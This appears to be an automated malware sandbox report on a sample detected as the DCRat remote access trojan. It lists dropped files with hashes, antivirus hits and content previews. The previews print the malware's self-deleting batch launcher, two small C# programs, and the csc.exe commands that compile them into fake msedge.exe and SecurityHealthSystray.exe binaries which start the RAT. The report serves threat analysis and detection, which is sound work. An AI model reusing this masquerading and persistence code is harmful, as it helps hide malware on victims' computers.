                  Preview:.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.g.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.e.d.g.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro

                  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                  Download File
                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):4608
                  Entropy (8bit):3.9050693763320967
                  Encrypted:false
                  SSDEEP:48:6wmdtFxZ8RxeOAkFJOcV4MKe28duYO9vqBH3uulB+hnqXSfbNtm:iyxvxVx9DO9vkpTkZzNt
                  MD5:EF67F18B139917104A78BB5587106589
                  SHA1:A8B6B85876271F5FAD48CB7C73C65A1EFFBA3845
                  SHA-256:C14CB8704E4D56EECADB9F8B5C4305990EF26EFE1029DB8437D1F9F7744F696B
                  SHA-512:D0CB40DBE677CC4163B183EE977A60C60399931AA20544A0E47AFE8D71C4E7F5381FFB70806E5CF75B15EB9F4E3BE6492FDB06978920F75011FB6AB7FB1D02EC
                  Malicious:true
                  Antivirus:
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....(ng.............................'... ...@....@.. ....................................@.................................T'..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..,.............................................................(....*.0..!.......r...pr...p.{....(....(....&..&..*....................0..........r...p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings............#US.........#GUID....... ...#Blob...........WU........%3................................................................

                  C:\Users\user\AppData\Local\9e85d929f61550

                  Download File
                  Process:C:\Users\user\Desktop\ArELGBzuuF.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):254
                  Entropy (8bit):5.750599230269045
                  Encrypted:false
                  SSDEEP:6:2bvXAyl128faqgYKdCPycn34/loSr/8bcL9DkPrm3GUlXRYn:2TXAt3d9e4NoBbYVkjmBlXRY
                  MD5:39AC41815ACFDACEACC3B8D1F5C6C1E8
                  SHA1:DCA8E56BBAFD05AA146AA96FC33C0A904FBE0130
                  SHA-256:EA4088D0C1528C9041B88930D99941B477205B446D2123204B7924231F8CC3DC
                  SHA-512:74D7AE1D676633761C8C4F9F901D5936925BBC98F103D86EA7F339684038F6623AE33B48A174649D027FFDDB63AC1F8C262BF650687F0D5E004B757F7598B04A
                  Malicious:false
                  Preview:gSi208N2JdBZVQC4jNMpDQLFre8LVYXfBpounU5LkXKEMjVShkxOHKLPHdLVABgvFgYplSRPSBFqGG2IJpovkJY0dYnKIjKi0Y9qKpqPTi5GFfJAkCMUXvK6HhLMoGGt0gzrHM7d8ZbCNSv8PmjGWzLEOCindekMbLQipc3XFtW7UHszwN7ChAWAVucEoU9ezPlCCMSxtLAndNuGUs0QhipayPN59ytut1IFgqxk5KSV9tgHAWt6dt7RkLNw8X

                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ArELGBzuuF.exe.log

                  Download File
                  Process:C:\Users\user\Desktop\ArELGBzuuF.exe
                  File Type:CSV text
                  Category:dropped
                  Size (bytes):1740
                  Entropy (8bit):5.36827240602657
                  Encrypted:false
                  SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKk+HKlT4vHNpv:iq+wmj0qCYqGSI6oPtzHeqKk+qZ4vtpv
                  MD5:1152A0332636E97D888ECFF02C1B19A9
                  SHA1:365D4052647A8B9BCC0512CBCFB12279316549FD
                  SHA-256:C72695BD822EB0EB112850B84D7ABBD5BADF07C3A0A670422D9DA3620BAE6EB4
                  SHA-512:9FFC281DBF24C21DDEC4BE93941339B7601AD12C24D11176668DBDFD0AD5826FDA463620BF9E129030D9119BF9A9E21C45A999F31249AA9BD65B85546783AD28
                  Malicious:true
                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\staticfile.exe.log

                  Download File
                  Process:C:\Users\user\AppData\Local\staticfile.exe
                  File Type:CSV text
                  Category:dropped
                  Size (bytes):1281
                  Entropy (8bit):5.370111951859942
                  Encrypted:false
                  SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                  MD5:12C61586CD59AA6F2A21DF30501F71BD
                  SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                  SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                  SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                  Malicious:false
                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                  C:\Users\user\AppData\Local\Temp\3tz3CUwFBN.bat

                  Download File
                  Process:C:\Users\user\Desktop\ArELGBzuuF.exe
                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):221
                  Entropy (8bit):5.006715362628848
                  Encrypted:false
                  SSDEEP:6:hCijTg3Nou1SV+DE1923WCCvKOZG1923fMu:HTg9uYDEiGh
                  MD5:3CF843D374A274E016DBB932A88891FB
                  SHA1:344B6771081BEE4F9D6CBEC56E28A2DB62FA5B92
                  SHA-256:329A927D37BB45BE4997B4D6EB8EB585729CCF32E99A16B15676E30BE88F7283
                  SHA-512:05731B0ACD4CBFA3848B7A116190FE60E2425A37042DF1860778FFE65E2EDEFEADF05854D36D4964E146FA8A7A800371CF31038C231BF5024011B88438481546
                  Malicious:true
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\AppData\Local\staticfile.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\3tz3CUwFBN.bat"

                  C:\Users\user\AppData\Local\Temp\5cQ3mFpko4

                  Download File
                  Process:C:\Users\user\Desktop\ArELGBzuuF.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):25
                  Entropy (8bit):4.403856189774723
                  Encrypted:false
                  SSDEEP:3:PEtp2YU4JMR:Pg254Ju
                  MD5:F68BE10759EE0CCAE63B9570492AA6B2
                  SHA1:B953294CEAE06E4AA9D0569B0FC78F259386FBE2
                  SHA-256:E4D2D3B9AE65A6A7D2243B590FDC9642E7AC7D858BFECF7F93B71D04B53BCCA6
                  SHA-512:6B7AD20AB110015FA969F46EBEEE8027E8B20257EA406C159A45E5483423D3D69AC4B9679CE6442A20F8112846941BBCF9CD7CD0481A7BD1CBC33CB5964F26F2
                  Malicious:false
                  Preview:QUXPTaFtG5mExQA41fVcBliVX

                  C:\Users\user\AppData\Local\Temp\RESB12E.tmp

                  Download File
                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6d0, 10 symbols, created Fri Dec 27 04:11:21 2024, 1st section name ".debug$S"
                  Category:dropped
                  Size (bytes):1928
                  Entropy (8bit):4.610515510470929
                  Encrypted:false
                  SSDEEP:24:HTK9AaLzVU8HJwKqxmNSlmxT0uZhNB+h9PNnqpdt4+lEbNFjMyi0+ecN:raLzK8SKqxmslmuulB+hnqXSfbNtmh7
                  MD5:4DB260FC2E1A9A169D3DBDBE7BD2E504
                  SHA1:C66F34A92BAEBC51E596A7A73CE39C51A4E7C063
                  SHA-256:9DF8BA73411319A7C5D396BD6AD1A6F5ED05DD6CFBE2E43EB140416493059C20
                  SHA-512:A442A920AF49850E19233AA9E8F246319760DE4F2E41EFB5C73AE99091337EC44E15D3629BCA699AAE3EDFAE6CF3024088BC3B6573B20BEA8C0B02C2B7C445AF
                  Malicious:false
                  Preview:L....(ng.............debug$S........X...................@..B.rsrc$01............................@..@.rsrc$02........8...................@..@........[....c:\Program Files (x86)\Microsoft\Edge\Application\CSCFB5D2BE025D440B3B78FE4AD3E8F4E5B.TMP....................q.QK.......N..........5.......C:\Users\user\AppData\Local\Temp\RESB12E.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.

                  C:\Users\user\AppData\Local\Temp\RESB66E.tmp

                  Download File
                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6ec, 10 symbols, created Fri Dec 27 04:11:23 2024, 1st section name ".debug$S"
                  Category:dropped
                  Size (bytes):1956
                  Entropy (8bit):4.551586866683348
                  Encrypted:false
                  SSDEEP:24:HVO9/Oa/qHowKqxmNaluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+QlUZ:HqqXKqxmEluOulajfqXSfbNtmh1Z
                  MD5:CC6B9A9CB950E0F1968EAE8F0EEE444E
                  SHA1:711D73F6DE474C5923CB6FBD98FAEA59480C565B
                  SHA-256:3C76CE82184D6D0AAA727C43CEEB96DA2066F924FB8452F1E5EB0C061919A8ED
                  SHA-512:DFAF161806D1EF2C8605068DCBC687CA6BF0453127827D8B6B38FB2C8CF2B7955DA0EFBF701F2BCA1647CAF284571D99F314780016AF189DD50BA691A529DB98
                  Malicious:false
                  Preview:L....(ng.............debug$S........<...................@..B.rsrc$01................h...........@..@.rsrc$02........p...|...............@..@........=....c:\Windows\System32\CSC97DCB281A28F42AF94908E122161F85F.TMP.....................r.av..t.y..............5.......C:\Users\user\AppData\Local\Temp\RESB66E.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.

                  C:\Users\user\AppData\Local\Temp\kdqn3ul3\kdqn3ul3.0.cs

                  Download File
                  Process:C:\Users\user\Desktop\ArELGBzuuF.exe
                  File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                  Category:dropped
                  Size (bytes):406
                  Entropy (8bit):4.946366938557994
                  Encrypted:false
                  SSDEEP:12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBLDniFkD:JNVQIbSfhWLzIiFkMSfhXiFkD
                  MD5:40143399138D1D6FFE6697C65D06DF29
                  SHA1:714AE057317E42B21B1A5651C6DF94CCEFF7FE1D
                  SHA-256:33A16A02A8CD0D48CDAD34B56A841272134E51F4746EB9F7AA75E88E466D3FCA
                  SHA-512:A3FD43760A145F2E84FE692389AB42EEB0C3F00CC7502FA1D902BB9BDEA37435518F67D9296182EB32DFFEF982F5E8A423D108E383449C5B6EED16FBAFEF5D61
                  Malicious:false
                  Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Users\user\AppData\Local\staticfile.exe"); } catch { } }).Start();. }.}.

                  C:\Users\user\AppData\Local\Temp\kdqn3ul3\kdqn3ul3.cmdline

                  Download File
                  Process:C:\Users\user\Desktop\ArELGBzuuF.exe
                  File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                  Category:dropped
                  Size (bytes):266
                  Entropy (8bit):5.149775506746875
                  Encrypted:false
                  SSDEEP:6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8o923fyUUihyA:Hu7L//TRRzscQy6y
                  MD5:058AD305E94425845A35DAACED89D43C
                  SHA1:4D47C0E00138E8D8F545ACD1565FC9DD9C5EB9E9
                  SHA-256:8D882CBB48F685EE02F01E722D7C96910A1EC22199BE4F25FAF34EC70A68B918
                  SHA-512:79B2EA25289F82CB4B9EB0E9EE90574A201FAC89C7523E1F067F1500DD3A1BBC0DFA11028634D4477C3622B4E26384825B1DC8065831FA93B764DFEC59B9DC8E
                  Malicious:true
                  Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\kdqn3ul3\kdqn3ul3.0.cs"

                  C:\Users\user\AppData\Local\Temp\kdqn3ul3\kdqn3ul3.out

                  Download File
                  Process:C:\Users\user\Desktop\ArELGBzuuF.exe
                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (346), with CRLF, CR line terminators
                  Category:modified
                  Size (bytes):767
                  Entropy (8bit):5.253277102071686
                  Encrypted:false
                  SSDEEP:12:KMi/I/u7L//TRRzscQy6rKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KMoI/un/VRzsty6rKax5DqBVKVrdFAMb
                  MD5:DAA13A065F13C251290826809DE89F1D
                  SHA1:08E1D106D3FA82DEDE119DE98F6F40F30753CAA7
                  SHA-256:6270022C2AAB528A1F77A90776AD455CC9E76ABF293014CB093867236E4D29E2
                  SHA-512:4B63E8CD827364AF41A8984B5967A23CA41589A5963EDEE069B1F806FBE911C32EE9294CB828CFDF2A32A6B09CA58556540F5484D7D1857F1903B5E3BE9DBDEF
                  Malicious:false
                  Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\kdqn3ul3\kdqn3ul3.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                  C:\Users\user\AppData\Local\Temp\sxun3xbz\sxun3xbz.0.cs

                  Download File
                  Process:C:\Users\user\Desktop\ArELGBzuuF.exe
                  File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                  Category:dropped
                  Size (bytes):391
                  Entropy (8bit):4.924992650977709
                  Encrypted:false
                  SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLDniFkD:JNVQIbSfhV7TiFkMSfhXiFkD
                  MD5:B54899960AA18EAE3453882EE5133259
                  SHA1:295929C8C45744BC22A3B3E7B74D0AD4D955BD38
                  SHA-256:D90383B924E78D90F07EA066138C91CFC4968A85ACADF7F6F1057B5290EBB404
                  SHA-512:8A7EFEC8C18558E382377EC745A769BB0BD089C753B48F17AAF9F1E5B72035AC43CBB826E0B2218BCABE3577149A233CAB6AE23E88D1E9A8778DED0B8356DC50
                  Malicious:false
                  Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Users\user\AppData\Local\staticfile.exe"); } catch { } }).Start();. }.}.

                  C:\Users\user\AppData\Local\Temp\sxun3xbz\sxun3xbz.cmdline

                  Download File
                  Process:C:\Users\user\Desktop\ArELGBzuuF.exe
                  File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                  Category:dropped
                  Size (bytes):251
                  Entropy (8bit):5.061384125196098
                  Encrypted:false
                  SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8o923f/QYyA:Hu7L//TRq79cQyz
                  MD5:19F44AA2FD927A57DE8644407FBA18D1
                  SHA1:4F0DFDC6F89DF3F9BFB8B0F0A0C1E786CFEB8D33
                  SHA-256:9D09CF0D59051B6FDB219A6B6DC9541115FAE8C1D46564656EB4BD3DF9FF7950
                  SHA-512:24D09014ADF000D1ABAD179929DE4FDFE049CF142A236CA67992805017E8230E554FB00F721D55C0BCB52A53830928774FD347AD620E1515655D812187326843
                  Malicious:false
                  Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\sxun3xbz\sxun3xbz.0.cs"

                  C:\Users\user\AppData\Local\Temp\sxun3xbz\sxun3xbz.out

                  Download File
                  Process:C:\Users\user\Desktop\ArELGBzuuF.exe
                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (331), with CRLF, CR line terminators
                  Category:modified
                  Size (bytes):752
                  Entropy (8bit):5.256115345811712
                  Encrypted:false
                  SSDEEP:12:KMi/I/u7L//TRq79cQySKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KMoI/un/Vq79tySKax5DqBVKVrdFAMBt
                  MD5:C0E428E9BA13B1C960F4257FAB7DFB9C
                  SHA1:BC202D994BFD1A26789F89DC9C55514F387A454D
                  SHA-256:962F3E85F906343598D40153B8C5CFC30B3F283BDD0274D6DA19593304929146
                  SHA-512:1E6C9E731862225C772488D762CF121961DD4F09E3290D32EF37B93369B2F545DD31A8B2A23EBFE08F774CB067AA4DE0F6FCFFE8A9C9F819B0445BE8A9DB3F99
                  Malicious:false
                  Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\sxun3xbz\sxun3xbz.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                  C:\Users\user\AppData\Local\staticfile.exe

                  Download File
                  Process:C:\Users\user\Desktop\ArELGBzuuF.exe
                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):539136
                  Entropy (8bit):5.755390767717009
                  Encrypted:false
                  SSDEEP:6144:k+Gyb1F8PdF6ZbmDShI5waSqLhzbtRqeObojE9gTbj74vaPXlsz66rZ:klq1G1FOuwxaRqAIgLBX+66rZ
                  MD5:C410E5BDD0E37AB9D6B8EFC9B1B26B71
                  SHA1:462C843A64DA7007418DA4F7D0609E08AFB755DE
                  SHA-256:D0894A5628FAB64B123FDDCAC95568A81B0F57298AE088A3EA548122B66D5F78
                  SHA-512:439FBFC6752E0E18CB1CB015B661D51F23835D537F57942D3C19CEBF0C490A74B3407208EFA0E1109B264369BFF2FCC896C8FE0023CC6023BE2DA130F1D3F02C
                  Malicious:true
                  Yara Hits:
                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\user\AppData\Local\staticfile.exe, Author: Joe Security
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: ReversingLabs, Detection: 79%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.........."......2...........Q... ...`....@.. ....................................@.................................XQ..S....`..p............................................................................ ............... ..H............text....1... ...2.................. ..`.rsrc...p....`.......4..............@..@.reloc...............8..............@..B.................Q......H.......P...............................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                  C:\Users\user\AppData\Local\staticfile.exe:Zone.Identifier

                  Download File
                  Process:C:\Users\user\Desktop\ArELGBzuuF.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):26
                  Entropy (8bit):3.95006375643621
                  Encrypted:false
                  SSDEEP:3:ggPYV:rPYV
                  MD5:187F488E27DB4AF347237FE461A079AD
                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                  Malicious:true
                  Preview:[ZoneTransfer]....ZoneId=0

                  C:\Windows\System32\CSC97DCB281A28F42AF94908E122161F85F.TMP

                  Download File
                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  File Type:MSVC .res
                  Category:dropped
                  Size (bytes):1224
                  Entropy (8bit):4.435108676655666
                  Encrypted:false
                  SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                  MD5:931E1E72E561761F8A74F57989D1EA0A
                  SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                  SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                  SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                  Malicious:false
                  Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

                  C:\Windows\System32\SecurityHealthSystray.exe

                  Download File
                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):4608
                  Entropy (8bit):3.940473966991625
                  Encrypted:false
                  SSDEEP:48:67zpHPtVM7Jt8Bs3FJsdcV4MKe27fYOgvqBHaOulajfqXSfbNtm:ktPMPc+Vx9MAOgvkEcjRzNt
                  MD5:FB861D268712CEE0CB95577EB5E7E138
                  SHA1:61D9970A68B8F9BF8D774F547CECB8DD80D7B4E6
                  SHA-256:E477675E25208604C96446EEC23BB0B74718AE55B97753CB8E64804F719EFC6D
                  SHA-512:04B241C85DF61EA9F0D18170F387433BCAC98E16B8720527F0B2319F2DCC289821BB63BCC06D6C078B37C98C82EE0E9AE2C5694D429A37D2FB1FDCC2AE906D22
                  Malicious:true
                  Antivirus:
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....(ng.............................'... ...@....@.. ....................................@.................................P'..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..(.............................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................

                  \Device\Null

                  Download File
                  Process:C:\Windows\System32\w32tm.exe
                  File Type:ASCII text
                  Category:dropped
                  Size (bytes):151
                  Entropy (8bit):4.792827495015012
                  Encrypted:false
                  SSDEEP:3:VLV993J+miJWEoJ8FXlam98/dNvrENqNvj:Vx993DEUa198/w+
                  MD5:9ADB5A337429003946942B79E7BF7143
                  SHA1:FDE67C2C7D809ACA657EFCD67C961ED0A19D795A
                  SHA-256:5DE9E0F72E7797728AA68779AF58F9C4973D2125B032B698AC2FC6D514D7F241
                  SHA-512:CF6DFA6ECC3DD003F219325C0EAABB1E590A65A6EB5258D96D696CAC396963ED4E294A6DC6F6A34165E84E5301EB2A00502DDCC2C69CCD4C39E449E434A31A45
                  Malicious:false
                  Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 26/12/2024 23:11:24..23:11:24, error: 0x80072746.23:11:29, error: 0x80072746.

                  Static File Info

                  General

